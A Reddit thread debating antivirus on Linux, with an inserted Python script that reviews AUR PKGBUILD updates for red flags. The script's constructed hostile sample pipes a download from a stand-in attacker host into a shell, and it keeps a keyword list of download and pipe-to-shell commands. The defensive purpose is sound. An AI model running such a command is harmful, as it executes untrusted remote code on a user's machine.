Let's talk about antivirus for linux
Posted by 0ajs0jas@reddit | linux | 56 comments
As a lot of us have already seen (in this post https://www.reddit.com/r/linux4noobs/comments/1op33pa/ransomware_help/), Linux adoption is on the rise. We used to be told not to care for viruses because hackers just don't care, but here we are. So what are you guys using as antivirus measures?
Kamdman@reddit
So I see a lot of pros and cons. Is there a decent anti-malware out there that is worth considering? This is for someone who knows very little about Linux and will be using it for email, browsing the web, and some office apps.
Nelo999@reddit
Well, there is chkrootkit, rkhunter, Linux Malware Detect as well as ClamAV.
All of them are terminal based and are mostly malware scanners.
It is good to have those of course, but as long as you only download software from the official repositories and do not click on random links you are in a very good place.
cgoldberg@reddit
The common methods most commercial AV products use offer very little protection for the types of exploits and attacks users should actually worry about. So security posture and practices are very important for Linux users, but adopting a similar shitshow of AV snakeoil products that many Windows users are accustomed to is definitely not the answer.
AnsibleAnswers@reddit
This is a very old canard that doesn't seem informed by modern antivirus, which typically uses both signature and behavior-based detection today. Windows Defender is actually quite sophisticated, with MsMpEng.exe doing a lot of the detection by opening files in an isolated environment to see what they actually do.
cgoldberg@reddit
Windows Defender is forced by organization. It is the single most annoying thing on my system. It devours system resources and causes me to reboot just to stop its scans and allow my system to be useable again. Meanwhile, it has never found any valid malware or vulnerabilities.
AnsibleAnswers@reddit
Tell me you don’t know how to use task scheduler some more…
This is beside the point, though. Modern antivirus for Windows is a lot more sophisticated than you’re assuming.
cgoldberg@reddit
Knowing how to use task scheduler doesn't stop scans forced by a group security policy that I can't disable.
I consider most Windows AV products to be malware themselves that cause more problems than they solve (regardless of sophistication). I'm glad similar software isn't popular on Linux.
AnsibleAnswers@reddit
My major point is that 1. you're wrong on a specific point and 2. we actually need to have a sound plan for Linux security if we don't want these resource-heavy solutions. Blaming users for being stupid won't cut it.
Modern Linux is already insecure in an enterprise environment without EDR.
Nelo999@reddit
Modern Linux is significantly more secure than Windows, even without EDR lol.
Although servers should absolutely be running antivirus software, no questions about it.
cgoldberg@reddit
Of course security is important. My point was replicating ineffective solutions from Windows isn't a solution.
Nelo999@reddit
Windows Defender is apparently "sophisticated", yet Windows users still get infected with malware left and right?
Windows Defender is not very good, one still has to pay for third party antivirus software if they want better protection on Windows.
And many people still do.
Zaphods-Distraction@reddit
It's called installing software from trusted repos/sources. If you go with blind faith on third party repos, then that's a PEBKAC problem, not a Linux problem.
Frodojj@reddit
Nobody is perfect. Even some maintainers were compromised. Even the distributions themselves aren’t immune. Sometimes the websites for the distros were compromised too. Unwittingly downloading malware from a trusted source that was compromised without your knowledge is definitely possible. That is indeed a Linux problem. …and a Windows problem. …and a Mac OS problem. It’s a problem with any OS. Writing it off as “stupid users” is not a good solution.
Nelo999@reddit
No OS is really immune to malware, but when 83% to 95% of all malware targets Windows, it is significantly a Windows problem more than a Linux one.
Frodojj@reddit
Security isn’t a bragging right; using lax measures will make malware getting into your system much more likely no matter the OS.
dddurd@reddit
I think official repository incidents are a different kind of issue here. The impact might be the same. AFAIK such things didn't happen with Mac/Windows update servers. Educating users (exactly the same thing as calling them stupid) can go very far.
shroddy@reddit
This so much!!! Closing our eyes and pretending malware can't hurt us, as long as we are "not stupid" no longer cuts it. I personally don't think antivirus is the right answer and I am more in the "we need a sandbox" camp, but malware on Linux won't go away, no matter how much we wish it would.
Frodojj@reddit
Thank you. I also think sandboxing via Firejail or using access control via SELinux or AppArmor is good for workstation users. But scanning still has a place (in addition to sandboxing/access control) when setting up servers such as email or file sharing.
Zaphods-Distraction@reddit
Look, I know shit can happen even when you do everything the right way, but that's also why you have a backup scheme: NAS, encrypted cloud, detached archival storage for files that really, really matter.
Frodojj@reddit
Backup is not a substitute for security. Malware can steal passwords or personal information.
Zaphods-Distraction@reddit
I'm talking about ransomware here specifically
Frodojj@reddit
The OP didn’t seem limited to ransomware. Ransomware isn’t the only kind of malware. Ransomware can also have multiple payloads that still do the other things. So I don’t think that changes anything.
AnsibleAnswers@reddit
The issue is PEBKAC problems need to be accounted for. They can’t just be dismissed from a security standpoint. Humans use operating systems, and humans are not always careful.
Vulpes_99@reddit
I had to google PEBKAC and found out it's a term in Brazil, with a literal translation 😂
We old timers technicians also used to call it a "BIOS Problem", BIOS meaning "Bicho Ignorante Operando o Sistema" (Ignorant Animal Operating the System) 🤣
Inevitable_Type_419@reddit
I like referring to it as a layer 8 issue; some end users have become privy to the PEBKAC acronym's meaning 😅
Vulpes_99@reddit
As in the OSI layers? That's quite the specific one 😂
Inevitable_Type_419@reddit
Yizzer! It works great because everyone in IT [sans the L1 who refuses to learn the basics including OSI] gets the reference, but if an end user overhears they won't catch on 😅
Vulpes_99@reddit
That's so evil that I can't help but loving it 😂
DavidJohnMcCann@reddit
Install software from official repositories. Do not use Arch AUR or Ubuntu PPAs, although SlackBuilds are safe. If your distro doesn't have the stuff you need, then either you need a different one or you should compile from source. That policy has kept me safe for 25 years.
natermer@reddit
Antivirus would NOT have stopped that.
It wouldn't have stopped that in Linux and it wouldn't have stopped that in Windows.
Upstairs-Comb1631@reddit
That's a bit of a problem, because only paid products exist as comfortable antiviruses.
NGRhodes@reddit
That case doesn’t show Linux needs antivirus. People unpacked the freerdp3 packages. There were no scripts, no payloads, nothing hidden. More likely, the user ran something else and wiped the system before anyone could trace it.
That’s not a Linux issue. It’s a lapse in basic user security habits, running unverified code, trusting unknown commands, no isolation or rollback. Attackers count on that. Social engineering is still the main attack vector, and no antivirus can protect against misplaced trust.
githman@reddit
To quote an adorable piece from a certain internet archive's FAQ:
In Linux, you are your own antivirus; it's been discussed repeatedly over decades. Furthermore, the Linux world is too disparate, inconsistent and fast-changing in many mutually incompatible directions at once to make copying the Windows anti-malware approach feasible.
What could a Linux antivirus technically rely upon?
If you have a potentially working approach to suggest, feel free to revolutionize the industry and likely become a trillionaire. Modern Linux market is vast.
AuDHDMDD@reddit
common sense+adblock+proper firewall+proper dns
Jumpy-Dig5503@reddit
AUR? Oof. Lotta malware has been found there. We need to start taking this seriously. Our security is losing its obscurity.
Inevitable_Taro4191@reddit
Read the package build, see what it does. It's your responsibility as an Arch user to properly check what you install.
I know people often use AUR helpers, and some of them just install stuff without checking.
It's not too hard, and you quickly get used to it and learn something. You basically check what sources it is pulling from, you verify that source, you skim through it and see if it looks ok.
dddurd@reddit
Depending on the amount it can be tedious on upgrade. You always review on upgrade? I use Gentoo, which is kind of everything-AUR but reviewed, and I personally don't review at all.
nply@reddit
The PKGBUILDs rarely change substantially on updates. Usually only the version number and hash do. Looking at the diffs it's easy to spot red flags like a changed source URL or added install scripts.
I only give PKGBUILDs a closer look on first install and make sure the source is what I'm expecting. After that it just takes a few seconds to glance over the diffs.
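The review habit described in the two comments above (check the sources on first install, then only glance at the diff on updates) can be scripted for the common red flags. The checker below is an added example, not code from the thread or from any AUR helper; in practice you would run it over `git diff` output in the cloned AUR repo. It flags a download host that was not in the previous PKGBUILD, a `SKIP` checksum that disables verification, a newly added `install=` hook, and download or pipe-to-shell commands that appear in a build function for the first time. The two PKGBUILDs at the bottom are constructed for the example; `example-tool`, `example.org` and `cdn.evil.example` are placeholders, not real packages or hosts.

```python
"""Flag risky changes between two versions of an AUR PKGBUILD (added example).

Not the thread's or any AUR tool's code. On a routine bump only pkgver/pkgrel
and the checksums should move; everything else the script reports is worth a
human look. The sample PKGBUILDs below are constructed; the hosts are fake.
"""
import re
from urllib.parse import urlparse

SCALAR_RE = re.compile(r"^(\w+)=([^\n(]+)$", re.M)             # pkgver=1.2.0
ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)", re.S | re.M)        # source=(...)
FUNC_RE = re.compile(r"^(\w+)\(\)\s*\{(.*?)^\}", re.S | re.M)  # package() {...}
# Heuristic list: commands that should not show up in a build step out of nowhere.
SUSPECT_CMDS = ("curl ", "wget ", "base64", "eval ", "bash -c", "sh -c", "| sh", "chmod +s")


def parse_pkgbuild(text):
    """Minimal parser for the usual PKGBUILD layout; it is not a bash interpreter."""
    scalars = {m.group(1): m.group(2).strip() for m in SCALAR_RE.finditer(text)}
    arrays = {m.group(1): [s.strip("'\"") for s in m.group(2).split()]
              for m in ARRAY_RE.finditer(text)}
    funcs = {m.group(1): m.group(2) for m in FUNC_RE.finditer(text)}
    return scalars, arrays, funcs


def source_host(entry):
    """'localname::https://host/path' -> 'host'; local files have no host."""
    return urlparse(entry.split("::", 1)[-1]).netloc or "(local file)"


def review_update(old_text, new_text):
    """Return human-readable findings; an empty list means a routine bump."""
    ov, oa, of = parse_pkgbuild(old_text)
    nv, na, nf = parse_pkgbuild(new_text)
    findings = []
    old_src, new_src = oa.get("source", []), na.get("source", [])
    new_hosts = {source_host(s) for s in new_src} - {source_host(s) for s in old_src}
    findings += [f"source: new download host {h}" for h in sorted(new_hosts)]
    findings += [f"source: new or changed entry {s}" for s in new_src if s not in old_src]
    for key in ("sha256sums", "b2sums", "md5sums"):
        if "SKIP" in na.get(key, []) and "SKIP" not in oa.get(key, []):
            findings.append(f"{key}: checksum verification newly skipped")
    if "install" in nv and "install" not in ov:
        findings.append(f"install: new hook {nv['install']} (runs as root at install time)")
    for name, body in nf.items():                      # new lines in build functions
        old_lines = set(of.get(name, "").splitlines())
        for line in body.splitlines():
            if line not in old_lines and any(c in line for c in SUSPECT_CMDS):
                findings.append(f"{name}(): new command {line.strip()!r}")
    for key in sorted(set(ov) | set(nv)):              # any other scalar that moved
        if key not in ("pkgver", "pkgrel", "install") and ov.get(key) != nv.get(key):
            findings.append(f"{key}: changed {ov.get(key)!r} -> {nv.get(key)!r}")
    return findings


# Constructed sample: a plain package whose only source is the upstream tarball.
OLD_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
pkgdesc="Constructed example package"
source=("$pkgname-$pkgver.tar.gz::https://example.org/releases/$pkgname-$pkgver.tar.gz")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Routine bump: only the version and the tarball checksum move.
BENIGN_UPDATE = OLD_PKGBUILD.replace("pkgver=1.2.0", "pkgver=1.2.1").replace("1111", "2222")

# Hostile bump: extra source from an unknown host with its checksum skipped,
# a new install hook, and a pipe-to-shell appended to package().
MALICIOUS_UPDATE = """\
pkgname=example-tool
pkgver=1.2.1
pkgrel=1
pkgdesc="Constructed example package"
install=$pkgname.install
source=("$pkgname-$pkgver.tar.gz::https://example.org/releases/$pkgname-$pkgver.tar.gz"
        "helper.sh::https://cdn.evil.example/helper.sh")
sha256sums=('2222222222222222222222222222222222222222222222222222222222222222'
            'SKIP')
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -fsSL https://cdn.evil.example/helper.sh | sh
}
"""

if __name__ == "__main__":
    print("benign:", review_update(OLD_PKGBUILD, BENIGN_UPDATE) or "nothing to see")
    for finding in review_update(OLD_PKGBUILD, MALICIOUS_UPDATE):
        print("malicious:", finding)
```

The benign bump produces no findings; the hostile one produces five. Two caveats a reviewer should keep in mind: the command list is a heuristic, so a clean diff from this script is not a clean bill of health, and a changed `source` entry that keeps the same host (say, a new path on a compromised project site) is reported only as "new or changed entry", which still needs a human to confirm the new download is what upstream actually published.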
AuDHDMDD@reddit
minimal and smart air as well. I bundled packages and aur
Recipe-Jaded@reddit
There aren't many instances of malware on the AUR, especially not for packages people actually install.
Ice_Hill_Penguin@reddit
Antimalwares shall execute you. Cheers! (your wines)
formegadriverscustom@reddit
I've been using PCs for 35+ years. Personally, I've never used an "antivirus" or feel the need to install one, not even when I was on DOS/Windows.
"Antivirus" are a rather poor substitute for common sense and experience. On other people's machines, I've often seen "antivirus" repeatedly interfere with legitimate programs and consume massive amounts of resources. For most people lacking common sense, some kind of ad blocker will be much, much more effective and efficient than any "antivirus" will ever be.
I'll say "antivirus" are, at best, not much more useful than placebo, and at worst a much bigger problem than the things they supposedly protect you from.
dddurd@reddit
Looks like it came from some deb repository but the analysis disagrees. OP must've extracted or executed random stuff. For now you can still trust the official repos, it's not like flathub.
iheartrms@reddit
I don't see viruses as a problem for Linux. It just works differently. Configure fapolicyd if you are particularly concerned.
Business_Reindeer910@reddit
nothing
whosdr@reddit
One thing I tried is setting up an encrypted filesystem as a file, mounted in a separate namespace to run things like web browsers and social apps. The idea being that any application I run on my system otherwise won't be able to access these.
That's intended to protect against session theft malware.
I hit some roadblocks and haven't picked up my efforts again yet. But it looks like it should be doable.
Ok_Instruction_3789@reddit
I don't use any antivirus. But I just don't download anything that I don't trust either lol.
WeedlnlBeer@reddit
If Linux gains popularity, anti-malware companies will take notice.
JagerAntlerite7@reddit
sudo apt-get install ... from distro and trusted repos? Sure. Anything else? Maybe an AppImage or two. I feel safe enough.
p0358@reddit
With btrfs or something, snapshots can easily protect you against the effects of ransomware
quigongene@reddit
If I grab something sketchy off the internet, I run it through VirusTotal first.
airmantharp@reddit
Me, when my wife asks me to install something...
aue_sum@reddit
SELinux + Flatpak + perhaps immutable distros
Isacx123@reddit
Common Sense 2025, pretty good antivirus, also works on Windows.
Don't run random executables from unknown sources, this advice applies to all operating systems.
DFS_0019287@reddit
No AV for me.